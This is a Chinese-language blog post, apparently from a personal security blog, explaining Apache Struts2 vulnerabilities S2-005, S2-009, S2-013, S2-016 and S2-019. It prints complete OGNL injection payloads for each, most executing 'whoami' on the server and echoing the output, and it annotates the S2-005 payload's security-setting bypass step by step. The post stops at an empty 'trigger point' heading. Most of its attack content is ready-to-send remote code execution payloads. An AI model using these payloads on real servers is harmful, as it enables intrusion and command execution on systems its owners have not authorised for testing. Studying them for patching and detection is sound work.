

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Cayce">
  <meta name="keywords" content="">
  
    <meta name="description" content="0x00 前言​        过了一段迷茫期，试图重新捡起漏洞触发原理的研究，之前也没有认真的看过struts框架，停留在copy大佬的payload直接写进poc的阶段，这段时间还是认真沉淀一下，熟悉熟悉触发原理，做做深入研究吧。 ​        第一篇先挑一部分struts元祖级别的编号漏洞看看，想必也不会那么难入门吧！ 0x01 s2-005&#x2F;s2-009&#x2F;s2-013&#x2F;s2-016&#x2F;s">
<meta property="og:type" content="article">
<meta property="og:title" content="struts2漏洞payload及触发原理(一)">
<meta property="og:url" content="http://example.com/2022/05/11/struts2%E6%BC%8F%E6%B4%9Epayload%E5%8F%8A%E8%A7%A6%E5%8F%91%E5%8E%9F%E7%90%86-%E4%B8%80/index.html">
<meta property="og:site_name" content="Atlantis">
<meta property="og:description" content="0x00 前言​        过了一段迷茫期，试图重新捡起漏洞触发原理的研究，之前也没有认真的看过struts框架，停留在copy大佬的payload直接写进poc的阶段，这段时间还是认真沉淀一下，熟悉熟悉触发原理，做做深入研究吧。 ​        第一篇先挑一部分struts元祖级别的编号漏洞看看，想必也不会那么难入门吧！ 0x01 s2-005&#x2F;s2-009&#x2F;s2-013&#x2F;s2-016&#x2F;s">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-05-11T01:07:03.000Z">
<meta property="article:modified_time" content="2023-02-05T08:29:15.539Z">
<meta property="article:author" content="Cayce">
<meta property="article:tag" content="struts2">
<meta property="article:tag" content="payload">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>struts2漏洞payload及触发原理(一) - Atlantis</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Cayce&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="struts2漏洞payload及触发原理(一)"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-05-11 09:07" pubdate>
          May 11, 2022 am
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.9k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          41 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">struts2漏洞payload及触发原理(一)</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h1><p>​        过了一段迷茫期，试图重新捡起漏洞触发原理的研究，之前也没有认真的看过struts框架，停留在copy大佬的payload直接写进poc的阶段，这段时间还是认真沉淀一下，熟悉熟悉触发原理，做做深入研究吧。</p>
<p>​        第一篇先挑一部分struts元祖级别的编号漏洞看看，想必也不会那么难入门吧！</p>
<h1 id="0x01-s2-005-s2-009-s2-013-s2-016-s2-019-payload说明"><a href="#0x01-s2-005-s2-009-s2-013-s2-016-s2-019-payload说明" class="headerlink" title="0x01 s2-005/s2-009/s2-013/s2-016/s2-019 payload说明"></a>0x01 s2-005/s2-009/s2-013/s2-016/s2-019 payload说明</h1><h4 id="s2-005"><a href="#s2-005" class="headerlink" title="s2-005:"></a>s2-005:</h4><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs http">(&#x27;\43_memberAccess.allowStaticMethodAccess&#x27;)(a)=true&amp;(b)((&#x27;\43context[\&#x27;xwork.MethodAccessor.denyMethodExecution\&#x27;]\75false&#x27;)(b))&amp;(&#x27;\43c&#x27;)((&#x27;\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET&#x27;)(c))&amp;(g)((&#x27;\43mycmd\75\&#x27;whoami\&#x27;&#x27;)(d))&amp;(h)((&#x27;\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)&#x27;)(d))&amp;(i)((&#x27;\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())&#x27;)(d))&amp;(j)((&#x27;\43myres\75new\40byte[51020]&#x27;)(d))&amp;(k)((&#x27;\43mydat.readFully(\43myres)&#x27;)(d))&amp;(l)((&#x27;\43mystr\75new\40java.lang.String(\43myres)&#x27;)(d))&amp;(m)((&#x27;\43myout\75@org.apache.struts2.ServletActionContext@getResponse()&#x27;)(d))&amp;(n)((&#x27;\43myout.getWriter().println(\43mystr)&#x27;)(d))<br></code></pre></td></tr></table></figure>

<p>​        这里的\40、\43与\75是字符ascii编码对应的十进制数，斜杆代表转义，分别对应空格、#与=，这边是有C语言的<code>putchar(&#39;\75&#39;)</code>方法对其解码，解码后的payload总结为两大部分：Ognl配置参数设置与攻击主体</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs java">第一部分Ognl配置参数设置：<br>(<span class="hljs-string">&#x27;#_memberAccess.allowStaticMethodAccess&#x27;</span>)(a)=<span class="hljs-keyword">true</span><br>&amp;(b)((<span class="hljs-string">&#x27;#context[\&#x27;xwork.MethodAccessor.denyMethodExecution\&#x27;]=false&#x27;</span>)(b))<br>&amp;(<span class="hljs-string">&#x27;#c&#x27;</span>)((<span class="hljs-string">&#x27;#_memberAccess.excludeProperties=@java.util.Collections@EMPTY_SET&#x27;</span>)(c))<br>第二部分攻击主体：<br>&amp;(g)((<span class="hljs-string">&#x27;#mycmd=\&#x27;whoami\&#x27;&#x27;</span>)(d))<br>&amp;(h)((<span class="hljs-string">&#x27;#myret=@java.lang.Runtime@getRuntime().exec(#mycmd)&#x27;</span>)(d))<br>&amp;(i)((<span class="hljs-string">&#x27;#mydat=new java.io.DataInputStream(#myret.getInputStream())&#x27;</span>)(d))<br>&amp;(j)((<span class="hljs-string">&#x27;#myres=new byte[51020]&#x27;</span>)(d))<br>&amp;(k)((<span class="hljs-string">&#x27;#mydat.readFully(#myres)&#x27;</span>)(d))<br>&amp;(l)((<span class="hljs-string">&#x27;#mystr=new java.lang.String(#myres)&#x27;</span>)(d))<br>&amp;(m)((<span class="hljs-string">&#x27;#myout=@org.apache.struts2.ServletActionContext@getResponse()&#x27;</span>)(d))<br>&amp;(n)((&#x27;#myout.getWriter().println(#mystr)&#x27;)(d))#<br></code></pre></td></tr></table></figure>

<p>​        大的结构里面，看到(a)、(b)、(c)、(d)这一类的写法是为了遵循Ognl语法树的强制执行<a target="_blank" rel="noopener" href="https://blog.csdn.net/kuxinr/article/details/7591692">表达式规则</a>，将变量值写入载体abcd内。</p>
<p>​        第一部分的配置参数：</p>
<p>​        1.设置_memberAccess类中的allowStaticMethodAccess参数为true，允许静态方法调用；</p>
<p>​        2.谁在MethodAccessor类中的denyMethodExecution参数为false，允许方法执行；</p>
<p>​        3.设置_memberAccess类中的excludeProperties为空值，完成绕过官方增加安全配置禁止静态方法调用和否认方法执行限制。</p>
<p>​        第二部分攻击主体：</p>
<p>​        1.预设命令参数值<code>whoami</code>存入变量mycmd；</p>
<p>​        2.调用java.lang.Runtime类的子类getRuntime中命令执行方法exec执行预设的参数mycmd值，预设进程对象myret；</p>
<p>​        3.新建数据输出流java.io.DataInputStrea，将进程myret的数据流写入流变量mydat；</p>
<p>​        4.新建字节对象用于接收流数据；</p>
<p>​        5.读取流变量mydat的数据到myres字节对象中；</p>
<p>​        6.调用java.lang.String方法转化myres字节对象的内容到字符串变量mystr中；</p>
<p>​        7.创建struts2的HttpServletResponse类，写入对象myout；</p>
<p>​        8.将mystr的内容打印到响应界面。</p>
<h4 id="s2-009"><a href="#s2-009" class="headerlink" title="s2-009:"></a>s2-009:</h4><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs http">class.classLoader.jarPath=%28%23context[\&quot;xwork.MethodAccessor.denyMethodExecution\&quot;]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[\&quot;allowStaticMethodAccess\&quot;]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&amp;z[%28class.classLoader.jarPath%29%28%27meh%27%29]<br></code></pre></td></tr></table></figure>



<h4 id="s2-013"><a href="#s2-013" class="headerlink" title="s2-013:"></a>s2-013:</h4><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs http">a=1$&#123;(%23_memberAccess[\&quot;allowStaticMethodAccess\&quot;]=true,%23a=@java.lang.Runtime@getRuntime().exec(&#x27;whoami&#x27;).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[50000],%23c.read(%23d),%23sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())&#125;<br></code></pre></td></tr></table></figure>

<h4 id="s2-016"><a href="#s2-016" class="headerlink" title="s2-016:"></a>s2-016:</h4><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs http">redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D<br></code></pre></td></tr></table></figure>

<h4 id="s2-019"><a href="#s2-019" class="headerlink" title="s2-019:"></a>s2-019:</h4><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs http">debug=command&amp;expression=#f=#_memberAccess.getClass().getDeclaredField(&#x27;allowStaticMethodAccess&#x27;),#f.setAccessible(true),#f.set(#_memberAccess,true),#req=@org.apache.struts2.ServletActionContext@getRequest(),#resp=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=(new java.lang.ProcessBuilder(new java.lang.String[]&#123;&#x27;whoami&#x27;&#125;)).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[1000],#d.read(#e),#resp.println(#e),#resp.close()<br></code></pre></td></tr></table></figure>

<h1 id="0x02-触发原理"><a href="#0x02-触发原理" class="headerlink" title="0x02 触发原理"></a>0x02 触发原理</h1><h4 id="S2-005"><a href="#S2-005" class="headerlink" title="S2-005:"></a>S2-005:</h4><p>​        s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12)，struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象，struts框架通过过滤#字符防止安全问题，然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制，对于S2-003漏洞，官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补，但是安全配置被绕过再次导致了漏洞，攻击者可以利用OGNL表达式将这2个选项打开。</p>
<p>触发点：</p>
<p>​        </p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E%E5%9F%BA%E7%A1%80/" class="category-chain-item">常见漏洞基础</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/struts2/">#struts2</a>
      
        <a href="/tags/payload/">#payload</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>struts2漏洞payload及触发原理(一)</div>
      <div>http://example.com/2022/05/11/struts2漏洞payload及触发原理-一/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>Cayce</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>May 11, 2022</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/02/02/java%E6%BA%90%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-%E6%9C%8D%E5%8A%A1%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/" title="java源代码审计-服务端请求伪造">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">java源代码审计-服务端请求伪造</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/04/22/MacOS-%E9%87%8D%E8%A3%85Python2%E5%AF%BC%E8%87%B4pip2%E6%B7%B7%E4%B9%B1/" title="MacOS 重装Python2导致pip2混乱">
                        <span class="hidden-mobile">MacOS 重装Python2导致pip2混乱</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Blog</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>By Cayce</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
